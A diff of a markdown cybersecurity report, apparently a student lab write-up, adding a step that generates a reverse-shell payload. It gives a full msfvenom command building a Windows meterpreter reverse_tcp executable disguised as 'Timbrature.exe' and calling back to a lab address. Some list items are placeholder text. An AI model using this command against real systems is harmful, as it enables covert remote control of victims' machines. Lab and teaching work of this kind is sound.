AM311/Cybersecurity_Report/home.md

  6. **Generation of a payload for starting a reverse shell and injection** In a different shell window, we now proceed with the generation of an exploit through which we will try to inject a remote shell client to the computers of the organization.
-	We will use meterpreter as remote shell; for doing so, we run the following command on the Kali Linux machine to generate a payload that st
+	We will use meterpreter as reverse shell; for doing so, we run the following command on the Kali Linux machine to generate a payload that launches the reverse shell client:

+    `msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp  LHOST=10.0.2.15 -b "\x00" -f exe -o ./Desktop/Timbrature.exe`

  7. dd
  8. gg